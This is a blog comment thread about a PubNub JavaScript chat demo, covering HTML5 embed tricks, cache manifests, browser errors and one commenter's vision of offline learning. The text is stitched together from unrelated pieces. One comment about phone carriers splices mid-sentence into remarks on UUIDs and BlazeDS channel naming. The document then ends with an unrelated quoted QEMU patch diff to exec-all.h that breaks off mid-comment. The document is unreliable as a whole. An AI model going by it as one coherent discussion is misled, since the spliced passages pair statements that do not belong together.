Update: I have gotten the <embed> to work loading html page in to Windows IE 9 and Opera. To get Ben's page to work in my sandbox "alhanson.com" The Chat, you will have to call a friend on the phone or something, and have then login to chat. I have chatted with Hadrian from Caledonia located somewhere between Australia and New Zealand. You have to enter a lot "testing text" hit enter to push the text box down the page to get the scroll bar to pop out, and you can see Ben's embed page appear with your text scrolling up under my page. Because we embed a html document we have also embed the http protocol along with it. So if Ben had his page published as an html document some where else on the WWW i could link to it through the embed tag with full address. This fundamentally changes everything.
Basically html5 is a lot of nav bar links; section, article, and aside containers to embed powerful scripts behind. It is a layer of simple html formatted with a cascading style sheet run on a layer of powerful scripts, which seems to have a truly organic nature and evolving life of it own on the web.
Of course the next task is to be able to pass text from the simple html layer "the html5 page" to the embed html5 page with the script on it.
@Allan,
I just looked at the source of that page -- I'm still shocked that Embed tag works with an HTML page. That's just the craziest thing I've ever seen :D I really like the idea and it sounds like you're making some progress in where you can get it to work.
HTML5, in general, has some really cool stuff. I need to take some time to wrap my head around all the semantic tags. I get them from a philosophical standpoint; but, I just need to figure out how to organize them practically.
@All,
Also, it should be noted that pub/sub keys on the DIV can actually be placed right on the Script tag as well (so long as it as the id="pubnub" on it). This way, the same tag that includes the PubNub namespace can also define the keys.
Ben,
I have taken things on step farther. On my site a have a folder called "chat" with your html page in it benNadel.html, pubnub-3.1.min.js, jquery-1.6.1.min.js, and the chat.manifest. The chat.manifest the links pubnub-3.1.min.js, jquery-1.6.1.min.js to be cached on the two client's computers that have benNadel.html open. The link on your page links to pubnub-3.1.min.js on my site now. Seems to be working! I will attach the chat folder in am email and send it to you.
al
@Allan,
It's interesting - when I go to your chat page in Chrome, it actually says "Plug-in Missing".
Hello Ben,
I put your code in my php server and while I open it, it only have a disable send button. Could you please kindly provide more detail tutorial page for us?
Many Thanks,
Henry
"It's interesting - when I go to your chat page in Chrome, it actually says "Plug-in Missing". "
@ Ben that's the error I get in Firefox. I believe because Firefox see it as a "Plug-in" and not an object. I believe you will fined you are running an older version of Chrome. With the new version of Chrome on all of the computers I have tested on it has loaded. With the newer Version of Opera I have gotten it to open some of the time, sometimes you will get the "Plug-in Missing error" then you click refresh and it will load. Windows has a new online office just coming out and the page is load in the new version of IE running on 7.
I have added a link to a PhP web site I wrote a few years back. It is below the client to client chat link. The whole web site embeds in the html5. It needs some explanation. The whole web site loads as cached object or components when the first page loads. These objects are called to construct the rest of the pages of the web site from client side. The text that appears is queried from the SQL data base, filtered through an "includes PhP script", and spit out in html on to the page to be formatted by its CCS. Thus you have a web site that runs on little overhead of band width, spits out twits. "like twitter", which provides link to dynamic PDF type object. The dynamic PDF type object would be capable of running on it own client side scripts. The dynamic PDF type object would be like a Chapter\Short Story for third grade reader; let's say. It would contain a vocabulary list with a mouse over pronunciations, a data base of multiple choice questions, and a system of scoring the achievement of the client. The dynamic PDF type object would to have the ability off line Too. I just put this project on the back burner, because where was I going to find any programmers that were interested in creating any dynamic PDF type objects.
When wrote the swtchelp.com web site it was to help student connect to campus recourses over slow 28kps dialup connection that was available to local students. No one at the campus really cared or understood the problem. As long as the campus could connect to local school systems everything was fine. I wrote the swtchhelp.com web site to run over a satellite connection. A satellite connection has a slow ramp up, however I design my home page to appear in the middle of the ramp up process with functional navigation to the PDF object which could be pulled down off the satellite at T1 speeds 1500 kps.
In my vision, a barefoot nine year old boy in the third world begins his journey to a town with a satellite. He is carrying his village's Chrome Book type 3 pad with second solid sate hard drive for utilities and copy of OS, and third solid state hard drive for cache manifest back up. After taking care of business, He connects to the satellite and looks at the world, and as he does everything he sees is collected to the catch manifest to be carried back to his village. Lastly he goes to an online school and caches dynamic PDF objects for lessons on how to read. Back at his village under the yellow glow of a Kerosene lamp He and his friends peer in to the wonder of the computer screen in the excitement they see in the world about them. Power by an old car battery and charged through a solar panel in the day. It only takes time and a few pennies to help people help themselves and change the world about us.
@Henry,
Unfortunately, I know very little about PHP - I haven't programmed it in years. Sorry :(
@Allan,
Good sir, I love your vision! I felt good just reading it :)
I have successed put your code on my php website, however, no matter what I type in the sender side, the message I received only shows "object.object" .
@Henry,
That probably means you're trying to use an object rather than a property of that object. Whatever that object is, try logging it to the Firebug console or something to see what it is. subscribe.
It's not new exciting tech, it's been around for 10+ years now and many companies offer XMPP hosting, no server needed :)
@David,
I talk about things that are novel and exciting for *me*. On this blog, I almost never talk about when things were created and started to exist... unless to express remorse that I haven't heard about it until now.
And even still, just cause something was around for a while doesn't mean that it was necessarily very accessible to the public. Take phone integration, for example. Sure, you could make phone systems for a long time. BUT, it's only since Twilio where that has become an extremely low barrier to entry with extremely low pricing that has made previously existing technologies so accessible.
David I found Bens video refreshing and exciting. The only people that would be bemused and find the post novel would represent the position of the Baby Bells. They have been mitigating the problem for years. The funny part to all this is it looks like they have painted them self's in to a corner. David I take it you haven't driven any of these ["tech" that have been around for 10 years] around the block.
The bottom line is: Why should the Baby Bells be allowed to charge twice for the same service? Charge you for a block of data [5 Gig of 50 bucks] smartphone/touchpad then turn around and charge you for Voice (which now they send you as data) going against the data that has already been paid for benefitted from Your UUID approach to avoid this most often unwanted behaviour with PubNub; but superfluous messages are still sent around ...
- Channel Naming: I know that BlazeDS can handle hierarchical names; and wildcarding ! Any pointer to what is known about PubNub's approach ??
hello sir,
i want to know that how to get all hostory from pubnub channel and is there any way to set start and end parameter to pubnub.history function.
please help me sir
|
https://www.bennadel.com/blog/2213-sending-client-to-client-realtime-messages-with-the-pubnub-javascript-library.htm
|
CC-MAIN-2022-27
|
refinedweb
| 3,260
| 72.76
|
How do you decide if a change you made to your webpage is getting more customers to sign up? How do you know if the new drug you invented cures more people than the current market leader? Did you make a groundbreaking scientific discovery?
All these questions can be answered using a branch of statistics called hypothesis testing. This post explains the basics of hypothesis testing.
The first question everyone has is: did it work? How do you know if what you are seeing is due to chance or skill? To answer this you need to know: how often would you declare victory just because of random variations in your data sample? Luckily you can choose this number! This is what p-values do for you.
But before diving into more details let's set up a little toy experiment to work with and illustrate the different concepts.
measured.
def two_samples(difference, N=6500, delta_variance=0.): As = np.random.normal(6., size=N) Bs = np.random.normal(6. + difference, scale=1+delta_variance, size=N) return As, Bs
What does this look like then? We will create two samples with the same mean and 100 observations in each.
a = plt.axes() As, Bs = two_samples(0., N=100) _=a.hist(As, bins=30, range=(2,10), alpha=0.6) _=a.hist(Bs, bins=30, range=(2,10), alpha=0.6) print "Mean for sample A: %.3f and for sample B: %.3f"%(np.mean(As), np.mean(Bs))
Mean for sample A: 5.946 and for sample B: 6.093
You can see that the mean of neither of the two samples is exactly six, nor are the two values the same. Looking at the histogram of the two samples they do look kind of similar. If we did not know the truth about how these samples were made, would we conclude that they are different? If we did, would we be right?
This is where p-values and hypothesis testing come in. To do hypothesis testing you need two hypotheses which you would can pit against each other. The first one is called the Null hypothesis or $H_0$ and the other one is often referred to as "alternate" or $H_1$. It is important to remember that hypothesis testing can only answer the following question: should I abandon $H_0$?
In order to get started with your hypothesis testing you need to assume that $H_0$ is true, so the test can never tell you whether or not this assumption is a good one to make. All it can do is tell you that there is overwhelming evidence against your null hypothesis. It also does not tell you whether $H_1$ is true or not.
The p-value is often used (and abused) to decide if a result is "statistically significant". The p-value is nothing more than the probability that you observed a result as extreme (far away from $H_0$) or more extreme than the one you did by chance alone assuming that $H_0$ is true.
Let's stick with the example of us wanting to know if our changes to our website improved the conversion rate or not. The p-value is the probability for the mean in the second sample being bigger than the mean in the first sample due to nothing else but chance. In this case you can calculate the p-value by using Student's t-test. It is implemented in
scipy so let's reveal it:. print "P-value: %.5f, the smaller the less likely it is that the means are the same"%(p) one_sided_ttest(As, Bs)
P-value: 0.15576, the smaller the less likely it is that the means are the same
Common practice is to decide below which value the p-value has to be in order for this result to be statistically significant or not before looking at the data. By choosing a smaller value you are less likely to incorrectly conclude that your changes improved the conversion rate. Common choices are 0.05 or 0.01. Meaning you only make a mistake 1 in 20 or 1 in 100 times.
Let us repeat the experiment and look at another p-value:
As2, Bs2 = two_samples(0., N=100) one_sided_ttest(As2, Bs2)
P-value: 0.00285, the smaller the less likely it is that the means are the same
What happened here? The p-value is different! Not only is it different but it is also below 0.01, our changes worked! Actually we know that the two samples have the same mean, so how can this test be telling us that we found a statistically significant difference? This must be one of the cases where there is no difference but the p-value is small and we incorrectly conclude that there is a difference.
Let's repeat the experiment a few more times and keep track of all the p-values we see:
def repeat_experiment(repeats=10000, diff=0.): p_values = [] for i in xrange(repeats): A,B = two_samples(diff, N=100) t,p = stats.ttest_ind(A, B, equal_var=True) if t < 0: p /= 2. else: p = 1 - p/2. p_values.append(p) plt.hist(p_values, range=(0,1.), bins=20) plt.axvspan(0., 0.1, facecolor="red", alpha=0.5) repeat_experiment()
The p-value depends on the outcome of your experiment, that is which particular values you have for your observations. Therefore it is different everytime you repeat the experiment. You can see that roughly 10% of all experiments ended up in the red shaded area, they have p-values below 0.1. These are the cases where you observe a significant difference in the means despite there being none. A false positive.
What happens if there is a difference between the means of the two samples?
repeat_experiment(diff=0.05)
Now you get a p-value less than 0.1 more often than 10% of the time. This is exactly what you would expect as the Null hypothesis is not true.
An important thing to realize is that by choosing your p-value threshold to be say 0.05, you are choosing to be wrong 1 in 20 times. Keep in mind: This is true if you judged a lot of copies of this experiment. For each individual experiment you do, you are either right or wrong. The trouble is you do not know which one of the two it is.
The smaller a value you choose for your p-value threshold, the smaller the chance of being wrong when you decide to switch to the new webpage. Nobody likes being wrong so why not always choose a very, very small threshold?
The price you pay for choosing a lower threshold is that you will end up missing out on opportunities to improve your conversion rate. By lowering the p-value threshold you will conclude that the new version did not improve things when it actually did.
def keep_or_not(improvement, threshold=0.05, N=100, repeats=1000): keep = 0 for i in xrange(repeats): A,B = two_samples(improvement, N=N) t,p = stats.ttest_ind(A, B, equal_var=True) if t < 0: p /= 2. else: p = 1 - p/2. if p <= threshold: keep += 1 return float(keep)/repeats improvement = 0.05 thresholds = (0.01, 0.05, 0.1, 0.15, 0.2, 0.25) for thresh in thresholds: kept = keep_or_not(improvement, thresh)*100 plt.plot(thresh, kept, "bo") plt.ylim((0, 45)) plt.xlim((0, thresholds[-1]*1.1)) plt.grid() plt.xlabel("p-value threshold") plt.ylabel("% cases correctly accepted")
<matplotlib.text.Text at 0x106ede550>
From this you can see that the times you accept the new webpage (which we know to be better by 5%) is smaller if you choose your p-value lower. Missing out on these opportunities is the price you pay for being wrong less often.
For a fixed p-value threshold, you correctly decide to change your webpage more often if the effect is larger:
improvements = np.linspace(0., 0.4, 9) for improvement in improvements: kept = keep_or_not(improvement)*100 plt.plot(improvement, kept, "bo") plt.ylim((0, 100)) plt.xlim((0, improvements[-1]*1.1)) plt.grid() plt.xlabel("Size of the improvement") plt.ylabel("% cases correctly accepted") plt.axhline(5)
<matplotlib.lines.Line2D at 0x10711b910>
This makes sense. If the difference between your two onversion rates is larger, then it should be easier to detect. As a result you correctly choose to change your webpage in a higher fraction of cases. In other words the larger the difference, the more often you correctly reject the Null hypothesis.
The horizontal blue line marks the p-value threshold of 5%. You can see for the left most point at 0% improvement, we reject the Null hypothesis in 5% of cases and change our webpage. In reality the new webpage does no better than what we had before.
Similarly, the larger your p-value threshold the more often you correctly decide to reject the Null hypothesis. This comes at a price though, because the larger your p-value threshold, the higher the chance of you incorrectly deciding to change the website.
What we have called "% cases correctly accepted" is known in statistics as the power of a statistical test. The power of a test depends on the p-value threshold, the size of the effect you are looking for and the size of your sample.
For a given p-value threshold and improvement your chances of correctly detecting that there is an improvement depend on how many observations you have. If a change increases the conversion rate by a whopping 10% that is much easier to detect (you need to watch less people) than if a change only increases the conversion rate by 0.5%.
improvements = (0.005, 0.05, 0.1, 0.3) markers = ("ro", "gv", "b^", "ms") for improvement, marker in zip(improvements, markers): sample_size = np.linspace(10, 5000, 10) kept = [keep_or_not(improvement, N=size, repeats=10000)*100 for size in sample_size] plt.plot(sample_size, kept, marker, label="improvement=%g%%"%(improvement*100)) plt.legend(loc='best') plt.ylim((0, 100)) plt.xlim((0, sample_size[-1]*1.1)) plt.grid() plt.xlabel("Sample size") plt.ylabel("% cases correctly accepted")
<matplotlib.text.Text at 0x10aed9190>
As you can see from this plot, for a given sample size you are more likely to correctly decide to switch to the new webpage for larger improvements. For increases in conversion rate of 10% or more you can see that you do not need a sample with more than 2000 observations or so to gurantee you will decide to switch if there is an effect. For very small improvements you see that you need very large samples to be sure to actually detect the small improvement.
Now you know about hypothesis testing, p-values and how to use them to decide if you should switch, and you know that p-values are not all there is. The power of your test, the probability to actually detect an improvement if it is there is just as important as p-values. The beauty is that you can calculate a lot of these numbers before you ever start running an A/B test or the likes.
This post started life as a ipython notebook, download it or view it online.
|
http://betatim.github.io/posts/when-to-switch/
|
CC-MAIN-2018-30
|
refinedweb
| 1,885
| 65.93
|
In this tutorial, we'll learn how we can use Next.js with Strapi and Apollo.
Introduction
In one of my previous articles, I've written about how to get started using Strapi. In this post, we'll be building a newsfeed application using Next.js. The APIs necessary for the Next.js front-end application will be powered by Strapi. We'll also use Apollo as the GraphQL client.
The whole code for the application that we're going to build is available on Github.
Before we proceed, it's better if you have some idea about the following technologies:
I've been using Strapi for quite some time now and it's very easy to get up and running with it within a very short amount of time. It gives us a lot of features out of the box:
- Single types: Create one-off pages that have unique content structure
- Customizable API: With Strapi, you can just hop in your code editor and edit the code to fit your API to your needs.
- Integrations: Strapi supports integrations with Cloudinary, SendGrid, Algolia and others.
- Editor interface: The editor allows you to pull in dynamic blocks of content.
- Authentication: Secure and authorize access to your API with JWT or providers.
Next.js is a very popular React framework. It offers a lot of features like:
-: Automatic TypeScript configuration and compilation.
Apollo is the industry-standard GraphQL implementation, providing the data graph layer that connects modern apps to the cloud. It offers a lot of features like:
- Declarative data fetching: Write a query and receive data without manually tracking loading, error, or network states.
- Reactive data cache: Cut down on network traffic and keep data consistent throughout your application with Apollo Client’s normalized reactive data cache.
- Excellent dev experience: Enjoy cross stack type safety, runtime cache inspectors, and full featured editor integrations to keep you writing applications faster.
- Compatible and adoptable: Use any build setup and any GraphQL API. Drop Apollo Client into any app seamlessly without re-architecting your entire data strategy.
- Designed for modern UIs: Take advantage of modern UI architectures in the web, iOS, and Android ecosystems.
I've created a boilerplate so that you can get up and running with Strapi, Next.js and Apollo quickly. Check out the project on Github.
Creating a Strapi application using Docker
Step 1:. You can refer to this article for more details regarding how to install Strapi using Docker.
Step 2: We'll have to create our first administrator profile. Once, our administrator profile is setup, we should be able to log into the admin panel of Strapi.
Step 3: We'll have to add a new content-type.
Step 4: Install the Strapi GraphQL plugin.
I've already covered most about getting started with Strapi. We're adding links to a previous article in order to keep this tutorial short.
Creating a Next.js application
We can create a new Next.js app using create-next-app, which sets up everything automatically for us:
yarn create next-app
The above command will install all the necessary packages as well a create a new directory based on the application name (which you entered during the setup process).
Integrating the Next.js application with Apollo
In order to integrate Apollo with Next.js, we need to add the required dependencies first:
yarn add @apollo/client graphql
Next, we need to create a new file
lib/with-graphql.js with the following content:
import { ApolloClient, ApolloProvider, InMemoryCache } from "@apollo/client"; const WithGraphQL = ({ children }) => { const client = new ApolloClient({ uri: "", cache: new InMemoryCache(), }); return <ApolloProvider client={client}>{children}</ApolloProvider>; }; export default WithGraphQL;
Now, we can import this file and wrap any Next.js page where we want to use GraphQL:
import React from "react"; import Page from "components/pages/index"; import WithGraphQL from "lib/with-graphql"; const IndexPage = () => { return ( <WithGraphQL> <Page /> </WithGraphQL> ); }; export default IndexPage;
Now, we can use GraphQL queries and mutations in the
components/pages/index.js file:
import { gql, useQuery } from "@apollo/client"; import { Box, Stack } from "@chakra-ui/core"; import Feed from "components/pages/index/feed"; import React from "react"; const feedsQuery = gql` query fetchFeeds { feeds { id created_at body author { id username } } } `; const FeedsPageComponent = () => { const { loading, error, data } = useQuery(feedsQuery); if (loading) return <p>Loading...</p>; if (error) return <p>Error :(</p>; return ( <Stack spacing={8}> {data.feeds.map(feed => { return ( <Box key={feed.id}> <Feed feed={feed} /> </Box> ); })} </Stack> ); }; export default FeedsPageComponent;
Conclusion
In this tutorial, we've learnt how we can integrate Apollo with Next.js and use it with Strapi. I've created a boilerplate so that you can get up and running with Strapi, Next.js and Apollo quickly. Check out the project on Github. Documentation of this project is available here.
|
https://nirmalyaghosh.com/articles/js-strapi-apollo
|
CC-MAIN-2022-27
|
refinedweb
| 797
| 56.66
|
I'm trying to create inherited user control (not sure whether this is the right term). I have created a class Button (button.vb - there is no button.designer.vb) in a project with the following coding:
Public
End
After I build the project, I have no problem adding it to the toolbar and using it in another solution.
When I look at other user controls, I see there is a line Imports System.ComponentModel. I want to know what is the effect of adding that line to my coding:
Imports System.ComponentModel
Public Class Button
Inherits System.Windows.Forms.Button
An Imports directive just lets you use types from that namespace without fully qualifying the name. For example you can write just BindingList instead of System.ComponentModel.BindingList.
Imports directives don't change the compiled code in any way.
|
https://social.msdn.microsoft.com/Forums/en-US/aa55d929-c796-4b52-a7d9-732362c7860c/what-is-the-purpose-of-the-line-imports-systemcomponenetmodel?forum=vblanguage
|
CC-MAIN-2021-17
|
refinedweb
| 140
| 58.48
|
- Real-time content preview with watch mode
- GraphQL API
-
- Generating pages
- “Raw” fields
- Portable Text / Block Content
- Using .env variables
- How this plugin works
- Credits
See the getting started video
Install
From the command line, use npm (node package manager) to install the plugin:
npm install gatsby-source-sanity after running
gatsby develop to understand the created data and create a new query and checking available collections and fields by typing
CTRL + SPACE.
Options
Preview of unpublished content
Sometimes you might be working on some new content that is not yet published, which you want to make sure looks alright within your Gatsby site. By setting the
overlayDrafts setting to
true, the draft versions will as the option says “overlay” the regular document. In terms of Gatsby nodes, it will replace the published document with the draft.
Keep in mind that drafts do not have to conform to any validation rules, so your frontend will usually want to double-check all nested properties before attempting to use them.
Real-time content preview with watch mode
While developing, it can often be beneficial to get updates without having to manually restart the build process. By setting
watchMode to true, this plugin will set up a listener which watches for changes. When it detects a change, the document in question is updated in real-time and will be reflected immediately.
If you add a
token with read rights and set
overlayDrafts to true, each small change to the draft will immediately be applied..
Using images
Image fields will have the image URL available under the
field.asset.url key, but you can also use gatsby-image for a smooth experience. It’s a React component that enables responsive images and advanced image loading techniques. It works great with this source plugin, without requiring any additional build steps.
There are two types of responsive images supported; fixed and fluid. To decide between the two, ask yourself: “do I know the exact size this image will be?” If yes, you’ll want to use fixed. If no and its width and/or height need to vary depending on the size of the screen, then you’ll want to use fluid.
Fluid
import React from 'react' import Img from 'gatsby-image' const Person = ({data}) => ( <article> <h2>{data.sanityPerson.name}</h2> <Img fluid={data.sanityPerson.profileImage.asset.fluid} /> </article> ) export default Person export const query = graphql` query PersonQuery { sanityPerson { name profileImage { asset { fluid(maxWidth: 700) { ...GatsbySanityImageFluid } } } } } `
Fixed
import React from 'react' import Img from 'gatsby-image' const Person = ({data}) => ( <article> <h2>{data.sanityPerson.name}</h2> <Img fixed={data.sanityPerson.profileImage.asset.fixed} /> </article> ) export default Person export const query = graphql` query PersonQuery { sanityPerson { name profileImage { asset { fixed(width: 400) { ...GatsbySanityImageFixed } } } } } `
Available fragments
These are the fragments available on image assets, which allows easy lookup of the fields required by gatsby-image in various modes:
GatsbySanityImageFixed
GatsbySanityImageFixed_noBase64
GatsbySanityImageFluid
GatsbySanityImageFluid_noBase64
Usage outside of GraphQL
If you are using the raw fields, or simply have an image asset ID you would like to use gatsby-image for, you can import and call the utility functions
getFluidGatsbyImage and
getFixedGatsbyImage:
import Img from 'gatsby-image' import {getFluidGatsbyImage, getFixedGatsbyImage} fluidProps = getFluidGatsbyImage(imageAssetId, {maxWidth: 1024}, sanityConfig) <Img fluid={fluidProps} />
Generating pages
Sanity does not have any concept of a “page”, since it’s built to be totally agnostic to how you want to present your content and in which medium, but since you’re using Gatsby, you’ll probably want some pages!
As with any Gatsby site, you’ll want to create a
gatsby-node.js in the root of your Gatsby site repository (if it doesn’t already exist), and declare a
createPages function. Within it, you’ll use GraphQL to query for the data you need to build the pages.
For instance, if you have a
project document type in Sanity that you want to generate pages for, you could do something along the lines of this:}, }) }) }
The above query will fetch all projects that have a
slug.current field set, and generate pages for them, available as
/project/<project-slug>. It will use the template defined in
src/templates/project.js as the basis for these pages.
Most Gatsby starters have some example of building pages, which you should be able to modify to your needs.
Remember to use the GraphiQL interface to help write the queries you need - it’s usually running at while running
gatsby develop.
“Raw” fields
Arrays and object types at the root of documents will get an additional “raw JSON” representation in a field called
_raw<FieldName>. For instance, a field named
body will be mapped to
_rawBody. It’s important to note that this is only done for top-level nodes (documents).}) } } } }
Portable Text / Block Content
Rich text in Sanity is usually represented as Portable Text (previously known as “Block Content”).
These data structures can be deep and a chore to query (specifying all the possible fields). As noted above, there is a “raw” alternative available for these fields which is usually what you’ll want to use.
You can install block-content-to-react from npm and use it in your Gatsby project to serialize Portable Text. It lets you use your own React components to override defaults and render custom content types. Learn more about Portable Text in our documentation.!
|
https://www.gatsbyjs.com/plugins/gatsby-source-sanity
|
CC-MAIN-2021-10
|
refinedweb
| 888
| 51.99
|
Django + Mongo = Pytest FTW! A clean way to manage connecting and dropping of database between tests.
Sometime ago I started working on my own more of a playground project where I’m mostly trying to learn new things, but I also hope to create something useful from it that’s also in my field of interest. I figured out that it might be a good project for learning how to use integrate Django with Mongo database which I plan to use for some of the models.
Incorporating a new technology in your stack is never easy - in this case, besides learning new way to model the data, I also had to find a good ORM, came up with proper provisioning for my Vagrant box and TravisCI, and finally figure out how to do testing in this new environment.
In my project I’m using MongoEngine as an ORM which is pretty similar to Django’s ORM, well maintain, more or less easy to setup, and supported by many other plugins and libraries. I also use Pytest. Let’s look at most basic way to setup this environment for tests:
### FILE: testing_settings.py
import mongoengine
from .settings import *
# [...] some settings overrides
mongoengine.connection.disconnect() # disconnect main db first
In my main
settings.py file I’m connecting to proper Mongo database, the above file is run only by Pytest, so first I’m disconnecting. This looks the same in every other case that I will later write about. After that we need to connect to our testing database, so still in
testing_settings.py:
connect('testdb', host='mongomock://localhost')
From now on every call made by MongoEngine will be made to this database. However if you are used to Django testing you probably would want to have a clean database in each test case. We can achieve this by calling
drop_database() method on DB instance which is returned on proper
connect() so one way to connect and drop on each test is to use Pytest’s so called xUnit style
setup_method and
teardown_method:
import mongoengine as me
from ..models import Site
class SiteTests:
def setup_method(self):
self.db = me.connect(
‘testdb’,
host=’mongodb://localhost’
)
def teardown_method(self):
self.db.drop_database(‘testdb’)
self.db.close()
def test_object_creation(self):
site = Site(name=’test_site’)
site.save()
assert Site.objects.first().name == site.name
So in our setup method we are connecting to a testing database, and that database is then bound to an attribute so it can be easily dropped and the connection closed on the teardown. Test is passing, and everything is ok, but…
I usually write my tests in several files, most often these are
test_models.py test_forms.py test_views.py In this files usually there are several classes, when you multiply it by many apps it becomes obvious that you need to use that teardown and setup few times… Let’s come up with a better way of doing it (besides OOP methods).
Pytest fixtures for the rescue! Pytest assertions are very clean, there are plenty of configuration options, but fixtures feature is the biggest deal - if you still aren’t using them, then you definitely are missing a fantastic tool. Let’s look how we can use them in this case:
### FILE: fixtures.py
import pytest
import mongoengine as me
@pytest.fixture(scope=’function’)
def mongo(request):
db = me.connect(‘testdb’, host=’mongodb://localhost’)
yield db
db.drop_database(‘testdb’)
db.close()
I usually create this file in
utils or
common directory, so then I can import it everywhere where I need it. This fixture connects to the database, yields it, and after it scope finishes db is dropped, and connection closes. I set the scope to
function explicitly, but it’s a default value. If I set it to
module then all tests within a single module would use the same database. Fixture is used like a dependency injection:
from utils.fixtures import mongo
from ..models import Site
class SiteTests:
def test_object_creation(self, mongo): # use the fixture
site = Site(name=’test_site’)
site.save()
assert Site.objects.first().name == site.name
def test_object_creation2(self, mongo): # use the fixture
site = Site(name=’test_site2')
site.save()
assert Site.objects.first().name == site.name
Both tests pass. In the same way we can import this fixture to other modules, and everything will work. If I needed the database to be persistent for couple of tests then I could create another, almost the same fixture but with scope set to for example
class. Prior to Pytest 2.10 creating fixtures with teardowns (dropping the db in our case) was a bit more complicated, but now using
yield is pretty neat, I love it!
So we still have to inject the fixture as one of the arguments for each test, it will be quite a lot of writing, so… can it get any better? It actually can :)
from utils.fixtures import mongo
@pytest.mark.usefixtures('mongo')
class SiteTests:
def test_object_creation(self):
site = Site(name='test_site')
site.save()
assert Site.objects.first().name == site.name
By decorating the class Pytest automatically uses given fixtures in each method. Keep in mind that in the decorator the fixture must be given as a string (yet it still needs to be imported), otherwise tests in this class won’t run, no warnings, watch out for that.
MongoEngine’s documentation suggests using Mongomock in tests, which is built around excellent Mock module from the Python standard library. To use it - after it’s installation - just change the connection URI like this:
# mongodb => mongomock
db = me.connect(‘testdb’, host=’mongomock://localhost’)
And that’s it! Since it’s not a real db tests are faster and we no longer need to have Mongo itself installed (which might be a case for some CI tools), but everything works fine! At least when test cases aren’t to complicated - well, this is just a mock, and not every Mongo functionality is implemented, but that’s an issue, which can be easily managed with fixtures: just create one fixture for “real” db, and one for the mock, then decorate your classes accordingly.
That’s not all: I haven’t mention yet that fixtures are modular, which means that you can build couple of them into one, and that they can also get parameters, but I will write more about it some other time, meanwhile I suggest going through the docs.
I hope this was helpful, cheers.
|
https://medium.com/@antash/django-mongo-pytest-ftw-1610c99588ab
|
CC-MAIN-2018-47
|
refinedweb
| 1,070
| 63.19
|
When I think of Eloqua, I think of marketing automation. More specifically, I think of the ability to automate complex e-mail nurturing campaigns. For my thought leadership post as part of the Luminary pathway, I want to share my experience using Eloqua for something that the average person doesn’t associate with Eloqua – landing pages.
At Pearson VUE, I help our IT clients market and sell their certification products. I was recently challenged to help a client increase the number of certifications coming from high school and college students.
We designed a campaign to influence students by communicating our message through parents of high school students and guidance counselors. Our goal was to raise awareness of the ability to receive college credit for completing specific IT certifications. We would evaluate the success of the campaign based on several factors, including the number of academic exams delivered, number of visitors to the student landing page, and the engagement level of visitors to the web site.
We selected a media partner to promote the global campaign online and utilized a programmatic advertising platform to perform advanced targeting through machine learning. To enable the advertising tracking and remarketing, we needed to integrate several technologies into our landing pages.
Working with our internal development team, Eloqua was not the immediate solution brought to the table. There were other landing page tools our team had more experience with. However, the 80+ hours of Eloqua training I consumed during the last year led me to recommend Eloqua.
Eloqua offered a few key advantages. First of all, the ability to create landing pages on-the-fly was available with Eloqua at no additional charge. The other tools we looked at charged additional fees based on landing page traffic. Eloqua also offered the only all-in-one solution. Not only could we use Eloqua for two critical landing pages, but we could also use Eloqua to automate and route the form responses we received from our campaign. We were also able to leverage Eloqua’s reporting and analytics capabilities.
Eloqua allowed us to focus on the design and content of the landing pages as we didn’t have to write a bunch of custom code. For example, one of the landing pages we created included a form for guidance counselors to request a packet of materials for their classroom. We used the standard features of Eloqua forms to make all of the form fields required, saving us from having to write or implement Javascript code. Once the form was submitted, one e-mail was sent to our internal team to notify us of a new submission and another was sent to the requester of the information. A personalized e-mail was automatically sent informing them that they would be receiving a package in the mail shortly. We also displayed a thank-you page after they submitted the form. The thank-you page would redirect to a new page with additional certification resources after one minute. The redirect was simple to setup in Eloqua.
To track the effectiveness of our marketing efforts and allow us to remarket to landing page visitors, we implemented cookies, pixel tracking, analytics code and onclick event handlers. Although this didn’t directly require anything specific from Eloqua, it was great to know that Eloqua’s hosting capabilities were able to accommodate custom HTML code.
It’s hard to specify the specific Eloqua courses that provided me with the knowledge to strategize this type of campaign in Eloqua. It was really the combination of the 25+ classes I attended during the last year that provided the background I needed. If I was to name a few key courses, I’d have to mention Fundamentals of Forms and Landing Pages, Advanced Editing and Form Processing and Fundamentals of Emails.
I was reminded of the importance of backing up your files during this campaign. At one point, we needed to utilize the Recovery Checkpoint capability of Eloqua. If you’re not familiar with this feature, Eloqua saves local copies on your computer that are called Recovery Checkpoints. Any changes to a landing page, including title, images, text boxes, formatting, etc. qualifies for a new checkpoint to be created. You can restore to a checkpoint by clicking on the action menu (gear icon) in your landing page and then selecting Recovery Checkpoints. Eloqua will save the last twelve checkpoints. However, you need to be aware of some caveats. This feature is dependent on the use of the Firefox browser and only works on the same computer. Keep in mind that Eloqua automatically recreates a recovery checkpoint every 10 minutes. That means that if you’re working on a file for over 2 hours, you will only have the last two hours’ worth of checkpoints to which you can return (ie. 12 maximum check points x a back every 10 minutes = 120 minutes of backup).
This campaign has benefited our business by providing our teams with greater insight into what Eloqua has to offer. Eloqua helped consolidate the number of different tools and technologies needed to implement our marketing campaign. Although it is too early to show the revenue impact this campaign is driving, we are already seeing tangible results!
|
https://community.oracle.com/groups/oracle-marketing-cloud-academy/blog/authors/Gary%20Elfert
|
CC-MAIN-2019-35
|
refinedweb
| 872
| 53
|
On 24/03/16 16:42, Alex Bennée wrote: >> diff --git a/include/exec/exec-all.h b/include/exec/exec-all.h >> > index 05a151da4a54..cc3d2ca25917 100644 >> > --- a/include/exec/exec-all.h >> > +++ b/include/exec/exec-all.h >> > @@ -257,20 +257,32 @@ struct TranslationBlock { >> > struct TranslationBlock *page_next[2]; >> > tb_page_addr_t page_addr[2]; >> > >> > - /* the following data are used to directly call another TB from >> > - the code of this one. */ >> > - uint16_t tb_next_offset[2]; /* offset of original jump target */ >> > + /* The following data are used to directly call another TB from >> > + * the code of this one. This can be done either by emitting direct or >> > + * indirect native jump instructions. These jumps are reset so that >> > the TB >> > + * just continue its execution. The TB can be linked to another one by >> > + * setting one of the jump targets (or patching the jump >> > instruction). Only >> > + * two of such jumps are supported. >> > + */ >> > + uint16_t jmp_reset_offset[2]; /* offset of original jump target */ >> > +#define TB_JMP_RESET_OFFSET_INVALID 0xffff /* indicates no jump generated >> > */ >> > #ifdef USE_DIRECT_JUMP >> > - uint16_t tb_jmp_offset[2]; /* offset of jump instruction */ >> > + uint16_t jmp_insn_offset[2]; /* offset of native jump instruction */ >> > #else >> > - uintptr_t tb_next[2]; /* address of jump generated code */ >> > + uintptr_t jmp_target_addr[2]; /* target address for indirect jump */ >> > #endif >> > - /* list of TBs jumping to this one. This is a 